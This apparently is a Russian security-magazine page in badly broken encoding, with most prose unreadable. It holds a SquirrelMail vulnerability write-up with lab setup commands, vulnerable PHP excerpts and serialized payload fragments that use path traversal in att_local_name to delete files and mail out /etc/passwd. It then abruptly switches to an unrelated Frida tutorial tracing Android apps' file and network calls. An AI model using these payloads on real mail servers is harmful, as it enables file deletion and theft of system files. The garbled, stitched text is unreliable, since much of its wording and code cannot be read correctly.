?????�?�??�?�???�???�???�??�??��??�???.
useradd�G爉ail燼ttacker
install�d�g燼ttacker�o燼ttacker�/home/attacker
cat�/etc/passwd|grep燼ttacker|sed�'s/x/{PLAIN}passw/;爏/.$//'��/etc/
dovecot/users
??�?????�?�??�?????��??�???燗pache�??�?�??�??�???��??�??�???�?
SquirrelMail��??�??�?�??�??�??�?,��??????�?�??????�?.
cat�>/etc/apache2/apache2.conf�<EOL
Alias�/squirrelmail�/usr/local/squirrelmail/www
<Directory�/usr/local/squirrelmail>
牋燨ptions營ndexes燜ollowSymLinks
牋燗llowOverride燦one
牋燫equire燼ll爂ranted
</Directory>
EOL
???� ???�?� ??� ?� ???� ???�????�????.� ??????� ?????�???� ???�?????� ???�???
?�?????�??�????�???�???�?��??�????�??�????�?.
service燿ovecot爏tart�&&爏ervice燼pache2爏tart�&&爏ervice爏endmail�
start
???�?�???�???�??燬quirrelMail
??????????? ??????
?
? �?????�?????
?????
??? ????????? ?????
??????�??????????????
?????�?????????��????????
SQUIRRELMAIL
??????
????�???�??�???��??�???�??�????�?????�???�?,�??�??��??�?��???�
???.�???�???�???��????�?�?????燾ompose.php.
????�???�??�????�?????�???�?�燬quirrelMail
???�???�??� SquirrelMail� ??????�?� ??� PHP,� ?????�?� ???????� ????�??� ?� ????�
????�??????�??�?�??�???�?.�?�????�???�??�?�???�???�????� show?
InputForm.
/src/compose.php
647:牋牋爄f�($compose_new_win�=�'1')爗
648:牋牋牋牋燾ompose_Header($color,�$mailbox);
649:牋牋爙爀lse爗
650:牋牋牋牋燿isplayPageHeader($color,�$mailbox);
651:牋牋爙
...
695:牋牋爏howInputForm($session,�$values);
???�???�??�??�??�??�???�?�?�????�??�?�??�???�????�??�??�??.
?????�????�??�?�???�????,�??�???�??�?????????��??�??�?�???�???�
????�??�???.
???�??�?�???�????�??�??�?��???�?
???� ???????� ????�?� Attach� ???�??� POST????�??� ??� ???� ???� ??� ??????� com?
pose.php.� ?� ???�?� ??????�???� ????????� attach,� ?� ????�???�???� ????�
??????�????�???:
/src/compose.php
92:爏qgetGlobalVar('attach',$attach,燬Q_POST);
...
582:爙爀lseif�(isset($attach))爗
...
588:牋牋爄f�(saveAttachedFiles($session))爗
589:牋牋牋牋爌lain_error_message(_("Could爊ot爉ove/copy爁ile.燜ile�
not燼ttached"),�$color);
590:牋牋爙
591:牋牋爄f�($compose_new_win�=�'1')爗
592:牋牋牋牋燾ompose_Header($color,�$mailbox);
593:牋牋爙爀lse爗
594:牋牋牋牋燿isplayPageHeader($color,�$mailbox);
595:牋牋爙
596:牋牋爏howInputForm($session);
597:爙
???� ??????,� ?� ????�?� 588� ??????�???� ???�???� saveAttachedFiles,� ???
?????�???�???�??�?�??�?��??�??????�??�?�??�??�??�????�????.�??
?????�????� ????�???� ???�???�??� $attachment_dir� ?� ???�?????�???�??
???�?燬quirrel燾onfig.php.
/src/compose.php
1562:爁unction爏aveAttachedFiles($session)爗
1563:牋牋爂lobal�$_FILES,�$attachment_dir,�$username,
1564:牋牋牋牋�$data_dir,�$composeMessage;
...
1567:牋牋爄f�(!爄s_uploaded_file($_FILES['attachfile']['tmp_name'])�)
{
1568:牋牋牋牋爎eturn爐rue;
1569:牋牋爙
1570:
1571:牋牋�$hashed_attachment_dir�爂etHashedDir($username,�$attach
ment_dir);
???�????�
???�?�
??????�???�?�
???????�??�
???�??�?
GenerateRandomString,� ???????� ???�???� ????�?� ?????�??� ???�?� ??� ????�
??????�??�????????�????�??�????.
/src/compose.php
1572:牋牋�$localfilename�燝enerateRandomString(32,�'',�;
1573:牋牋�$full_localfilename��"$hashed_attachment_dir/$localf
ilename";
1574:牋牋爓hile�(file_exists($full_localfilename))爗
1575:牋牋牋牋�$localfilename�燝enerateRandomString(32,�'',�;
1576:牋牋牋牋�$full_localfilename��"$hashed_attachment_dir/$localf
ilename";
1577:牋牋爙
/functions/strings.php
614:爁unction燝enerateRandomString($size,�$chars,�$flags��爗
615:牋牋爄f�($flags�&�1)爗
616:牋牋牋牋�$chars�.=�'abcdefghijklmnopqrstuvwxyz';
617:牋牋爙
618:牋牋爄f�($flags�&�2)爗
619:牋牋牋牋�$chars�.=�'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
620:牋牋爙
621:牋牋爄f�($flags�&�4)爗
622:牋牋牋牋�$chars�.=�'0123456789';
623:牋牋爙
...
629:牋牋爏q_mt_randomize();�/*營nitialize爐he爎andom爊umber爂enera
tor�*/
630:
631:牋牋�$String��'';
632:牋牋�$j�爏trlen(�$chars�)��
633:牋牋爓hile�(strlen($String)��$size)爗
634:牋牋牋牋�$String�.=�$chars{mt_rand(0,�$j)};
635:牋牋爙
636:
637:牋牋爎eturn�$String;
638:爙
??�??� ???�??�??� ????,� ???????� ???� ???�??� ?????�??�???�??� PHP,� ?????�
???�???�???�?��???�???�???��????�????�??�??�????�???�??.
/src/compose.php
1581:牋牋爄f�(!@rename($_FILES['attachfile']['tmp_name'],�$full_l
ocalfilename))爗
1582:牋牋牋牋爄f�(!@move_uploaded_file($_FILES['attachfile']['
tmp_name'],$full_localfilename))爗
1583:牋牋牋牋牋牋爎eturn爐rue;
1584:牋牋牋牋爙
1585:牋牋爙
???�?????�??�??�??�???�??�???�????�??��???�?
?� ?????�????� ??????�???� ?????� initAttachment� ????�?� Message.� ??
??????�?�??�??�?,�??�???�???�????�?��???�?,��????�??�???爀nti?
ties?�??�??�?�??�?�??�???�??�?�????�??�?�???�?燤essage.
/src/compose.php
1586:牋牋�$type�爏trtolower($_FILES['attachfile']['type']);
1587:牋牋�$name��$_FILES['attachfile']['name'];
1588:牋牋�$composeMessage?>initAttachment($type,�$name,�$localf
ilename);
1589:爙
/class/mime/Message.class.php
1091:牋牋爁unction爄nitAttachment($type,�$name,�$location)爗
1092:牋牋牋牋�$attachment�爊ew燤essage();
1093:牋牋牋牋�$mime_header�爊ew燤essageHeader();
1094:牋牋牋牋�$mime_header?>setParameter('name',�$name);
1095:牋牋牋牋�$pos�爏trpos($type,�'/');
1096:牋牋牋牋爄f�($pos��爗
1097:牋牋牋牋牋牋�$mime_header?>type0�爏ubstr($type,��$pos);
1098:牋牋牋牋牋牋�$mime_header?>type1�爏ubstr($type,�$pos+1);
1099:牋牋牋牋爙爀lse爗
1100:牋牋牋牋牋牋�$mime_header?>type0��$type;
1101:牋牋牋牋爙
1102:牋牋牋牋�$attachment?>att_local_name��$location;
1103:牋牋牋牋�$disposition�爊ew燚isposition('attachment');
1104:牋牋牋牋�$disposition?>properties['filename']��$name;
1105:牋牋牋牋�$mime_header?>disposition��$disposition;
1106:牋牋牋牋�$attachment?>mime_header��$mime_header;
1107:牋牋牋牋�$this?>entities[]=$attachment;
1108:牋牋爙
??�???�???� ???�????� ???�?????�?� ????�?� 1102,� ???� ???�??� ????� ??� ???�?
????�?� ?� ???�??� ???�???�???� ?� ????�???� att_local_name.� ???�?� ????� ???
????�???�???,� $composeMessage?>entities� ?????�??� ???� ????�?????�??
?�???�?�??�?.
???�?�??�?�????�????�????�?????�???�??�???爏howInputForm.�????�
??� ??????� ?� ???� ???�???� ????�?????�??� ???�?,� ?� ?� ????� ????�???� ????�
??????�???�??�???:
/src/compose.php
1136:爁unction爏howInputForm�($session,�$values=false)爗
...
1366:牋牋�//燾omposeMessage燾an燽e爀mpty爓hen燾oming爁rom燼爎estored�
session
1367:牋牋爄f�(is_object($composeMessage)�&&�$composeMessage?>entities
)
1368:牋牋牋牋�$attach_array��$composeMessage?>entities;
...
1463:牋牋爀cho燼ddHidden('composesession',�$composesession).
1464:牋牋牋牋燼ddHidden('querystring',�$queryString).
1465:牋牋牋牋�(!empty($attach_array)�
1466:牋牋牋牋燼ddHidden('attachments',爏erialize($attach_array))��''
).
1467:牋牋牋牋�"</form>\n";
??�???� ??????� ????�?� ???�????�??� ???�??,� ?� ???�?� ?????�???�?� ????�??
????� attachments,� ???????� ?????�??� ???� ???????�??� ????� ???�??� ?� ????
??????�??�????�??� ?� URL???????�??�??� ???????�??� $composeMessage?>
entities.
??�????�????�??�??�??��???�?????�???��??�?�??????�???
???�??�?�??�?�???�??�???�?�??????�???,�?�??�????�??????�???�???�
???� ?� ?� ????�?????� ??????�???�?� ???� ??????� ?� ???�???�???� ????�???�?
(??????�???,�???�???????�?�???�?�????�??�???爑nserialize).
/src/compose.php
115:爏qgetGlobalVar('attachments',牋牋牋牋牋�$attachments,牋牋牋牋牋�
SQ_POST);
...
371:爄f�(!empty($attachments))爗
372:牋牋�$attachments�爑nserialize($attachments);
373:牋牋爄f�(!empty($attachments)�&&爄s_array($attachments))
374:牋牋牋牋�$composeMessage?>entities��$attachments;
375:爙
??????????? ??????
?
? �?????�?????
?????
??? ????????? ?????
??????�??????????????
?????�?????????��????????
SQUIRRELMAIL
????????�???????????�?????
??�??�???�??�??�??�???�??�??�???�?????�???�??�?�???�??�??.�???�
???� ?� ???�?????�?� ???�????� ???� ????�?????�??� ????�??.� ????�???� ????
?� ????� Delete� Selected� Attachments,� ????�???????�?� ????�??� ?????�??� ????�
?????.
???�??�?�??�????�???�?????�???�??�?
??�?????�???�??�?????�???�??�???,�???�?????�?�??�????:
/src/compose.php
113:爏qgetGlobalVar('do_delete',牋牋牋牋牋牋�$do_delete,牋牋牋牋牋牋�
SQ_POST);
...
613:爙爀lseif�(isset($do_delete))爗
...
625:牋牋爄f�(isset($delete)�&&爄s_array($delete))爗
626:牋牋牋牋爁oreach($delete燼s�$index)爗
627:牋牋牋牋牋牋爄f�(!empty($composeMessage?>entities)�&&爄sset($
composeMessage?>entities[$index]))爗
628:牋牋牋牋牋牋牋牋�$composeMessage?>entities[$index]?>purgeA
ttachments();
631:牋牋牋牋牋牋牋牋爑nset�($composeMessage?>entities[$index]);
632:牋牋牋牋牋牋爙
?�??�?????�???�????� purgeAttachments,�??????�??�???�??�?��??�?
???�?????燩HP????�???爑nlink.
/class/mime/Message.class.php
1114:牋牋爁unction爌urgeAttachments()爗
1115:牋牋牋牋爄f�($this?>att_local_name)爗
1116:牋牋牋牋牋牋爂lobal�$username,�$attachment_dir;
1117:牋牋牋牋牋牋�$hashed_attachment_dir�爂etHashedDir($username,�$
attachment_dir);
1118:牋牋牋牋牋牋爄f�(爁ile_exists($hashed_attachment_dir�.�'/'�.�$
this?>att_local_name)�)爗
1119:牋牋牋牋牋牋牋牋爑nlink($hashed_attachment_dir�.�'/'�.�$this?>
att_local_name);
1120:牋牋牋牋牋牋爙
1121:牋牋牋牋爙
?� ???� ?� ????�???� att_local_name,� ??� ???????� ???�?� ????�???� ???�????.
???� ???� ???�????�?� ???�?.� ???� ???????� ???�????� ?� ???�???� unlink.
??� ?????�?� ???�????�????� ???� ????� ???�????,� ???????� ????� ????�???�??�?
???�???�???�?�?�??�?�??�????�???�?.��??�???�?�?????,�???�?�??
???�??� ?� ???�????�??� ???�??� ?????�?� ??� ???�?,� ?� ????�?� ?� ??� ????�???�
?????�???�???� attachments.�??�???�???,�??�??�?�??�?�??�??�???�???
???�????� ???�????�?� ???�?,� ????�?� ?????� ???� ?� ???�???.� ?� ????� ???�??
???�??�????�??.
...s:14:"att_local_name";s:32:"76Nh2n1ufiHXcSlNYvKe6SbBfpcQC1hG";}}
??�??,� ??� ???� ???????�?,� ???� ???� ???�?� ???�??�???.� ??????� ????�??�???
path� traversal:� ???� ??????� ../� ???�?� ???�?� ??� ?????�????� ?� ????�???,� ????�
??????�?�?�??�?��??�???�?????????�?�??�??�?????�??�??????�?????
?????�?.� ????� ??� ??� ??????� ??� ???�???,� ???� ?????�?� ???�??� ????�??�?????�
???� ???�??� ?� PHP,� ??� ???�?????� ???????�??� ??????� ???�?� ??� ????�????
???????�?�??��?�?�?????��???�????�??�????�燩HP.
???�????�?�??�??�??�????�???� owned��????�????� /tmp,�??�??�???�
????� ???�?� ????�?� ???�?,� ???�????�??� ??� ??????� ????� ????�?????�??
???� ???�?????� ???�??,� ??� ??????�?� ??????�?� ???????�??� (?� ????� ???�??
???� www?data).� ??????� ????�???� ????�???� att_local_name� ?� ??????�???
???�??.
...s:14:"att_local_name";s:24:"../../../../../tmp/owned";}}
????,�????�?�?,�??�??�?.
??�?????�??�????�??�?????�???�??�?�????�??�??????
??????�???????????�?????
???�???�??�??�???�??�??,�??�??�?�??�?????��??�???�?????�?�????�
?????燿eliverMessage.
/src/compose.php
1638:爁unction燿eliverMessage(&$composeMessage,�$draft=false)爗
1639:牋牋爂lobal�$send_to,�$send_to_cc,�$send_to_bcc,�$mailprio,�$
subject,�$body,
1640:牋牋牋牋�$username,�$popuser,�$usernamedata,�$identity,�$idents,
$data_dir,
1641:牋牋牋牋�$request_mdn,�$request_dr,�$default_charset,�$color,�$
useSendmail,
1642:牋牋牋牋�$domain,�$action,�$default_move_to_sent,�$move_to_sent;
1643:牋牋爂lobal�$imapServerAddress,�$imapPort,�$imap_stream_options,
$sent_folder,�$key;
...
1705:牋牋�/*爉ultipart爉essages�*/
1706:牋牋爄f�(count($composeMessage?>entities))爗
??� ???�?� ?????�????� ???�???�???� ???????� ????�??.� ?????� ??????�???� ????�
?????� ????�????.� ?� ??????�??�?� ??� ????�??�?????� ???�??�?� ?� ???�???
?????�????�???�????�????�??�???�?�??�??�??�?,�?��??�?�??�???�
???��????�????�?????爉ail�?�???�?燚eliver.
/src/compose.php
1826:牋牋爄f�($stream)爗
1827:牋牋牋牋�$deliver?>mail($composeMessage,�$stream,�$reply_id,�$
reply_ent_id);
1828:牋牋牋牋�$succes��$deliver?>finalizeStream($stream);
1829:牋牋爙
/class/deliver/Deliver.class.php
075:牋牋爁unction爉ail(&$message,�$stream=false,�$reply_id=0,�$reply_
ent_id=0,
076:牋牋牋牋牋牋牋牋牋�$imap_stream=NULL,�$extra=NULL)爗
...
138:牋牋牋牋�$this?>send_mail($message,�$header,�$boundary,�$stream,�
$raw_length,�$extra);
??�??�?�????�???�????爏end_mail.
/class/deliver/Deliver.class.php
167:牋牋爁unction爏end_mail($message,�$header,�$boundary,�$stream=
false,
168:牋牋牋牋牋牋牋牋牋牋牋牋&$raw_length,�$extra=NULL)爗
169:
170:牋牋牋牋爄f�($stream)爗
171:牋牋牋牋牋牋�$this?>preWriteToStream($header);
172:牋牋牋牋牋牋�$this?>writeToStream($stream,�$header);
173:牋牋牋牋爙
174:牋牋牋牋�$this?>writeBody($message,�$stream,�$raw_length,�$
boundary);
175:牋牋爙
??�??�????� ??????�??� ?� ??????� writeBody,� ???????� ??????�???� ????� ????�
?????�?� ????�????,� ?� ???� ???�?� ?� ????�?????�??� ???�?.� ???� ??????� ????�
?????�?� ???�????:� ????� ???�???� ????�???� att_local_name,� ??� ???� ???????�
????�?��????�??�??�?�??�?,�???�?�?�???�??�??�??�??�?�??�??�??
?????�????��???�???.
/class/deliver/Deliver.class.php
338:牋牋牋牋牋牋爙爀lseif�($message?>att_local_name)爗
339:牋牋牋牋牋牋牋牋爂lobal�$username,�$attachment_dir;
340:牋牋牋牋牋牋牋牋�$hashed_attachment_dir�爂etHashedDir($username,
$attachment_dir);
341:牋牋牋牋牋牋牋牋�$filename��$message?>att_local_name;
342:牋牋牋牋牋牋牋牋�$file�爁open�($hashed_attachment_dir�.�'/'�.�$
filename,�'rb');
343:牋牋牋牋牋牋牋牋�
344:牋牋牋牋牋牋牋牋爓hile�($tmp�爁read($file,�0))爗
...
356:牋牋牋牋牋牋牋牋爁close($file);
357:牋牋牋牋牋牋爙
??�??�?,�?????�????� att_local_name,�?�????�?????�???�???�?�??�?
??????�??�??�?��??�???,�??�?????�??�??�??.
??�??�????� ???�??� ?� ??????�??� ????�????� ?� ???�??� /etc/passwd
?�????�??�???�?.
...s:14:"att_local_name";s:24:"../../../../../etc/passwd";}}
??�????�??�??�??�?�?????�?�???�?�燬quirrelMail
??�??�?????�?� ????� ????????�?� ???�????� ????�?� ???� ????�?� ??????�???
???� ??� ?????�??� ?????,� ???�?� ???�?????� ????.� ???�????�?� ???�?� ???????
????�?牜?????�???粻?????�?��??�??燬ent,�??�??�??�?�????�?????�?????
?????.�????�??????�??�??��??�?????�??�?????�????��??????�???�?
Download.
???�??�??�?????�??�??�??�燬quirrelMail
????????????�?????????�(?????)
??????
???,�???�??�???�?�???�??�??�????�?�????�??�?�???�???�?�?????�???�
????�?�??�???�??�??�??�??.��??�??�???�???�???�???�??�??�??�???�
?????� ?????�?� ???�????�????� SquirrelMail.� ?????� ???�?????�?,� ???� ???�??
?� ???�????� ???�?????�??� ???�??� ?� ???�???,� ????� ??� ???�?� ???�???� ?????�
?????� ?????.� ?� ???� ??� ????�??,� ???� ????,� ???????� ?????�??� ????� ?????�??
???,�??�??��??�??�??�??�?��??�??�??�??�???�??�??�????�?�???????�
???.
?????
???????�?????
????????燯nixoid�燤obile
zobnin@glc.ru
????????
???�???????
????????�??
?�????�?????????
?�??????燜RIDA
???�?�?�??????��???�?��?????�????�????�??�????�
???,� ??� ????� ???�?� ???�?????�???� ??????�??????� ??????�
??????�?,� ?????�??�??�?� ?� ???????�?.� ??� ????� ???�??�???,
???????�?????�?�????�????�??�?.�??燜rida,�??�??,�???�
????�???� ????�???�?� ?� ???�???� ?� ??????�???� ???� ???�?
??�??�?燡avaScript.
???????�??????????
????�????,� ???� ????� ?� ????� ?????� ?????� ???�???.� ??� ?????�????� ???� ?� ????�
????�?� ?� ????�??�?� ???�??�???�?????� ??????�??.� ??� ???�???�???,� ???
?� ???�???�?� ??� ??????�?� ???�??� ??� ???,� ???� ??� ?????�??� ??????�???,
?� ???????� ?????�?????�??� ????????�?� ??� ???�???�?:� ???�???� ???�?� ?????�
??????,�??�??????�?��??�???�???�??�?.
??� ??� ????� ??????�????�?� ?� ?????�?� ????�??� ?????�???� ???�???
???�????�????�(????�???????�?�??�??????�???�??��??????�????�?� an?
droid:debuggable="true"� ?� AndroidManifest.xml),� ???�?� ????�?????,
???� ????�?� ???�???� ???�???�??� ???�??�?� ??� ???�????.� ?� ???�?� ????�???:
???� ???�?� ????�?????,� ???� ??????�?� ???� ???????�??,� ?� ????�?� ????�?
???� ?????�?.� ???�?????� ???:� ???�????�??� ???�??� ????� ?� ???????� ??????�
??????�?� ?� ?????�??�??�?,� ????�?� ?� ?????� ????????� ???�?,� ???�???�???
???????� ???????�?� ?� ???�???�???� ???�?,� ???�?� ????�?� ????� ??� ???�???
????�?��??��????�???.
?� ??????� ????�????,� ???� ?� ????� ????� ???�??�???,� ???�???�???� ???�?
??�??�?�?????�??�???�??�????�???�??�??�??�??�?,�???�?�?????�??
???�????�??� ???�???� ??� JavaScript.� ???????� ?????�??�???�??� ???�?????
smali,� ???????� ???�??� ???�?????�?????� ????,� ???????� ?????�????� ???�????�
????� ??� ????�?� ???�??�????�?� ?� ??????�??�?� ???�???�??,� ????????� ????�
???�??�???��?????�???�??�?�???.�????�?,�?�??�??
FRIDA
Frida��??�??�?????�???燚inamic營nstrumentation燭oolkit,�?�???�????�???�
???�??�??,� ???�???�???� ??� ????� ????�???� ????�???�??� ???� ?� ???�??� ????�
????�??.�??�??�??�??�???燜rida��??�??�???�??燙ydia燬ubstrate�??爄OS
?� Xposed� Framework� ???� Android,� ??� ?????� ????�???�?,� ???�???�?� ???????
?????�???�??�?.燜rida�???�???�?�?�??�??,�??�?????�?�?�??�???�???�?
????� ?� ??????� ?????�???� ???�???.� ????�?� ?� ????� JavaScript� ????�?� Objec?
tive?C� ???� Java,� ?� ??????�???� ????�??????�?� ???�???�???� �??�?粻 ?� ????�
??????� ???�???�??.� ??� ????�?� ???�??�????�?� ?� ???�??�?� ?� ????�??� ???
??????�??,� ??????�??� ????�??�?????� JS????�???� (??� ???� ????�??� ?????�?
??�??�????�????�??????�???�????�?).
Frida�??�?�???????��??�???�????,�??????�???�??�???�??????�??
??,� ????�??� Windows,� Linux,� macOS,� iOS� ?� ????� QNX.� ??� ??� ?????� ???????�
??????�?�??�?????�????�??�???�??�??燗ndroid.
????,�??�???�??�?:
1.�?�???�??�??????�???燣inux.�??�?�燱indows,�?,�??�?�?????�??�?
???�?????�??�???�??�??燗ndroid,�??�?�?????�?????燣inux.
2.�?�????�?????� adb.� ?� Ubuntu/Debian/Mint� ????�??�???�???� ?????�??
sudo燼pt璯et爄nstall燼db.
3.�?�????�??�???�???�??�??�????�?�???燗ndroid�2��???.燜rida�???�
??�???????��?�?????�??�??,�?�??�??�?�???�??�??�?�?????�????�
????燗PK�??????�???�??�???�??.�??�???�?�?????�?.
???�?????�???�????燜rida:
$爏udo爌ip爄nstall爁rida
??�??� ???�???� ???�??� Frida,� ???????� ????�?????� ????�?????� ??� ????�???.
???�??� ???�?� ???�?� ??� GitHub,� ???� ???�??� ???�??� ???�?� ???�?????� ?� ????�
????� Frida,� ???????� ??� ????�???�?� ??� ????.� ??� ??????� ??????�??� ??????
???�???�.6.55.�??�???�?:
$燾d爚/Downloads
$爓get爃ttps://github.com/frida/frida/releases/download/10.6.55/
frida?server?10.6.55?android?arm.xz
$爑nxz爁rida?server?10.6.55?android?arm.xz
???�??�???� ????�???� ?� ???�?,� ????�???� ???????� ??� USB� (???�???�?� ?
???�??�????�????��??????�?燯SB)��?????�???�??�??�?�???�???:
$燼db爌ush爁rida?server?10.6.55?android?arm�/data/local/tmp/
frida?server
??�???� ???????� ??� ????�???� ?� ???????� adb� shell,� ???�????�?� ???�??
???�?�?�??�??��????�???�??:
$燼db爏hell
>爏u
>燾d�/data/local/tmp
>燾hmod�5爁rida?server
>�./frida?server
??????�???
??,� Frida� ????�??�???� ??� ????,� ???�??� ???????� ??� ????�??�?� (??� ???�????
???�????��??????�??�??�????).�?????�???�??�?????,�??�?�?????�?
???�???.�??�??�?�??�???�???�?�????�??爁rida?ps:
$爁rida?ps�U
??�??�?�??�??�????�?�??�??�??�?,�??????�??�?�???�??�?�(????� ?U
????�???� USB,� ???� ????� Frida� ???????� ???�??� ???�??�??� ??� ??????�??
??????).� ????� ??� ??????� ????� ???�??,� ???�??,� ???� ??????� ?� ???�?� ?????�
??????��????�???�??�??�????.
???� ??????� ???�???�?� ?????�???� ????�????�?� ???�?????� ???????.� Frida
???�???�?� ?????�???� ????�????� ?� ?????� ?????�??� ???�??�?,� ?� ???� ???�?
???�?????�?????�???燣inux.�??�??�???�???�??�??�?????�????� open(
),�??????�?????�???�?�??�????�??�??�??�?�??�??�/???�?????.�?????�
???�???�????�?�????�???:
$爁rida?trace�i�"open"�U爋rg.telegram.messenger
????�?�??????��??�???�??????�????????�????�???.�?�????�??�??
????????�?�???�????�??�??�?�??�????�?�????�????:
open(pathname="/data/user/0/org.telegram.messenger/shared_prefs/
userconfing.xml",爁lags=0x241)
???� ????�?� ????�???,� ???� ?????�??� ??????� ????� userconfig.xml� ????�?
??????�?� shared_prefs� ?� ???�?� ???�??�??� ??????�?.� ???????� shared_prefs
?燗ndroid�?????�???�?�??�??�????�??�??�?,�????�?�??�????�???????�?,
???� ????� userconfig.xml� ?????�??� ???�???�?� ???�???�??.� ???� ????�
??????:
open(pathname="/storage/emulated/0/Android/data/org.telegram.messen
ger/cache/223023676_121163.jpg",爁lags=0x0)
?????�??�??�??�?.�????�??�???????�?�?????�?�??�????�??�??�??,
?????�?�??�???�??????�??�????�?�???�?�?�???.
open(pathname="/data/user/0/org.telegram.messenger/shared_prefs/
stats.xml",爁lags=0x241)
???�???�???��?????�?� shared_prefs.�???�?�??�?,�???????�??�??�???
??????�??????.
open(pathname="/dev/ashmem",爁lags=0x2)
???�????�????�?,�?�??�??�?�????�???�??�???�?.�???� /dev/ashmem
???�????�??,�?�?????�???�?�??�???�?�??�???�??�?�??�??�???��???�
?????��??????營PC????????�?燘inder.�??�?�?????,�??�???�?�???�???,
???�????�??�???�??�?�燗ndroid,�??�?�????�???�???????�??�?????�???�
????�??�???????�??????�??.�????�???�?�??�?�??�?�??�??�???.
?????�??
??� ?????� ?????�???????� ????�????� ?� ?????� ???�??� ???�?????� ???????,
???�????� connect(),� ???????� ??????�???�?� ???� ???�??�????� ?� ???�??�??
???�??:
$爁rida?trace�i�"connect"�U燾om.yandex.browser
??�????��??�??�??�??�????�?�??�?�??????�??�??:
2028爉s牋connect(sockfd=0x90,燼ddr=0x94e86374,燼ddrlen=0x6e)
2034爉s牋connect(sockfd=0x90,燼ddr=0x94e86374,燼ddrlen=0x6e)
???�???��??,�??�??�??�???�???�??�????�?�?????燾onnect()��??�???�
??????� ??� ?????�???� sockaddr.� Frida� ??� ???�?� ??� ???�???� ?� ?????�?� ???????
?????�???�??�?????,��??????�??�??�?�??�????�???.�?!�?�????�????�
????�??,�??????�????�???燜rida�??�????�???�??�????�?�?????�??�???�
????.��??�??�??,�??�?�????�??�??�???爏ockaddr�???!
???�?�?�????�??�????�?� frida?trace,�?�????�???�??????�??�??�?
?????�???�?:
connect:燗uto?generated爃andler燼t�"/home/j1m/__handlers__/libc.so/
connect.js"
???�???�???�??�?�??�???�????�??�??�???,�??????燜rida�????�???,�???�
??� ???????�??� ???�???�??� ????�???�?� ?� ???�??�??� ???�???.� ????�?� ??
??????�??�??� ??� ?????� ???� ????�??????�??�??� ?????,� ???????� ??� ???�???.
??�???�????�??�??�????�??:
onEnter:爁unction�(log,燼rgs,爏tate)爗
牋爈og("connect("�+
牋牋牋�"sockfd="�+燼rgs[0]�+
牋牋牋�",燼ddr="�+燼rgs[1]�+
牋牋牋�",燼ddrlen="�+燼rgs[2]�+
牋�")");
},
???�?,� ???� ???� ????�?� ???????� ???�??� ????�???� ???� ????.� ??� ??� ???�?,� ???
???�??�???�???�??�????�?�?????� connect()��??�??�?????�?�????�???
sockaddr,�?�???�???�?�????��?????.�???�????�???爏ockaddr�??�?�???�
??????�??:
struct爏ockaddr爗
牋爑nsigned爏hort牋牋sa_family;牋牋//燼ddress爁amily,燗F_xxx
牋燾har牋牋牋牋牋牋牋sa_data[14];牋//�燽ytes爋f爌rotocol燼ddress
};
?��??�??��?????�?�???燗F_INET,�??????�??��??�?,�????:
struct爏ockaddr_in爗
牋爏hort牋牋牋牋牋牋sin_family;牋�//爀.g.燗F_INET,燗F_INET6
牋爑nsigned爏hort牋爏in_port;牋牋�//爀.g.爃tons(3490)
牋爏truct爄n_addr牋爏in_addr;牋牋�//爏ee爏truct爄n_addr,燽elow
牋燾har牋牋牋牋牋牋爏in_zero[8];牋//爖ero爐his爄f爕ou爓ant爐o
};
struct爄n_addr爗
牋爑nsigned爈ong爏_addr;牋牋牋牋牋//爈oad爓ith爄net_pton()
};
??�???�??營P??????�??????�?��???�????�???�?�??�????�??�?�(short
sin_family�+爑nsigned爏hort爏in_port)��?????�?�???�(unsigned爈ong).�??�???�
???,� ???� ???� ???�?� ????????� ?� ???????�?� ????�?� 4,� ?????� ???�?????� 8� ????
??� ???????�???� ????�?� ?� ???�??�???� ??,� ???�?� ????????� ???�??�??� IP??????
?�??�???.�??�???�??,�??????�???�???�??�??�????:
onEnter:爁unction�(log,燼rgs,爏tate)爗
牋爒ar燼ddr�燼rgs[1].add("4")
牋爒ar爄p�燤emory.readULong(addr)
牋爒ar爄pString�燵ip�&�FF,爄p�>>��FF,爄p�>>��&�FF,爄p�
>>>�].join('.')
牋爈og("connect("�+
牋牋牋�"sockfd="�+燼rgs[0]�+
牋牋牋�",燼ddr="�+爄pString�+
牋牋牋�",燼ddrlen="�+燼rgs[2]�+
牋�")");
},
??�???�??�????,�??�?�??�??�????,�??????��??�?,�?�???�??�??????�
????� ???.� ???� ????�?????,� ???� ???� ???� ???�????�??� ???�??�???� ARM
??????�???� little?endian� ???????� ???�??.� ???�?� ????�?� ???�????� ??� ?????
Memory��????燼dd(),�??�??�?燗PI燜rida.
???�???�?�???��????�????�???爁rida?trace:
connect(sockfd=0xbb,燼ddr=173.194.222.139,燼ddrlen=0x10)
connect(sockfd=0xba,燼ddr=74.125.205.94,燼ddrlen=0x10)
??�??.�???�?,�???�???�????.�??�??�??�??�?�??�?�??�?????�?????
????燗F_UNIX,燗F_INET�燗F_INET6��??�?�????�??�???�?�??燗F_INET,�????�
??� ??� ?????� ????????� ???????�??�???� ????�?.� ??� ????� ??� ?????� ??????�?
???�???�??�??�?�?????燗F_UNIX��???????�??�??營P�(???�?????�?�?????�
??營Pv6??????�??�????營Pv4).�????�?????�????�???�?�????�??�?,�???�?
???�???�??�??��??�?�??�???�???.��???�??�??�??�??�????�1.118.
47.115.
??????????
??�??�?� ??,� ???�?????�?� Frida� ?????�?� ????,� ???� ?????�??� ????�????
?�????�??�??�??�?��??�?????�??????.�???�?�????�??�?�??�?????�
???�?� API� Frida,� ??� ???�??,� ???� ?� ???� ????� ???�??� Java.� ?� ???� ???????� ??
?????�????�???????�???�????��????燡ava????�????��??????,��???�
???,� ????�???� ????�????�?� ?????� ??????� ??????�??� ??????� ???�???�??
???燗ndroid�(?�??�??�?�??????�???�?燢otlin).
???�??��???�???��??�???�?�?????�??�???�??�????�??��??�????�
???� ????�??.� ???�??� ?????� ????� (?????� ??� ??????�???� enumerate.js)
?�?????��???�??�?????�???�?:
Java.perform(function()爗
牋燡ava.enumerateLoadedClasses({
牋牋牋爋nMatch:爁unction(className)爗
牋牋牋牋牋燾onsole.log(className);
牋牋牋爙,
牋牋牋爋nComplete:爁unction()爗}
牋爙);
});
???�????�???�??�??.�??�???�?�?????�?�????� Java.perform(),�????�
??????,� ???� ??� ?????� ???�??�???�?� ?� ???�????�??� ??????� Java� (???
Dalvik/ART� ?� ???�??� Android).� ?????� ??� ??????�?� ?????� Java.enumerate?
LoadedClasses()� ?� ??????�?� ???� ???� ???�???:� onMatch()� ?????� ?????�??
???牜????�???�??粻????�?,� onComplete()� ?� ?� ?????� ???�?� (???� ???�?,� ???
????�??�??�?�????,��?�??????�?�??�??�??).
??�??�???:
